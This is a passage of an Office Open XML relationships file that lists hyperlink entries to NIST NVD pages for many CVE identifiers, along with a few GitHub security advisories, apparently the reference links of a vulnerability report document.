Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80975" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80977" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80978" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80979" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80982" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80991" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80992" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80994" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80995" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81000" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81001" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81006" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81008" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81010" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81015" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81353" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82005" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82006" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82007" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8301" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8303" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83988" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83990" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84000" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89161" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89436" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89440" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89441" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89442" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89472" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89486" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89487" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89488" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89489" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89497" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89499" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89500" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89501" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89503" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89507" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89508" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89510" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89520" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89522" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89523" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89540" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89545" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89548" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89553" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89557" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89559" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89562" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89563" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89564" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89570" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89573" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89574" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89579" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89580" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89581" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89584" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89585" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89587" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89594" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89597" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89600" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89602" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89605" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89606" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89607" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89609" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89617" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89619" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89620" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89622" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89624" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89638" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89641" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89646" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89668" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89670" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89690" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89723" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89724" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89733" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89736" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89738" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89741" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89742" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89746" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89747" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89748" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89750" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89754" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89755" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89758" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89760" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89761" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89762" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89763" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89764" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89767" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89771" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17176" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73315" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79637" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80134" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81016" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82537" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89060" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89099" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89466" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89720" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89743" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71348" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71357" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62109" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62112" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80943" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90460" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-8mc5-7w9m-fqv6" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-fcqg-3mwf-cfcf" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-fh2f-24rh-r2vq" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-qvp4-q2p5-22gg" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14457" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15406" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15462" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18561" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44914" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49846" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50013" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54135" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54874" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57159" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63072" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63075" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63076" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67211" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68497" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71641" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71646" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73017" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73785" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77108" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77807" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78130" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78132" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78133" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78480" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79393" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79394" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79641" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80987" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80997" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80998" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87776" TargetMode="External" Id="rId486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87908" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89476" TargetMode="External" Id="rId488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89477" TargetMode="External" Id="rId489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89480" TargetMode="External" Id="rId490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89481" TargetMode="External" Id="rId491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89483" TargetMode="External" Id="rId492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89511" TargetMode="External" Id="rId493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89528" TargetMode="External" Id="rId494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89544" TargetMode="External" Id="rId495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89549" TargetMode="External" Id="rId496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 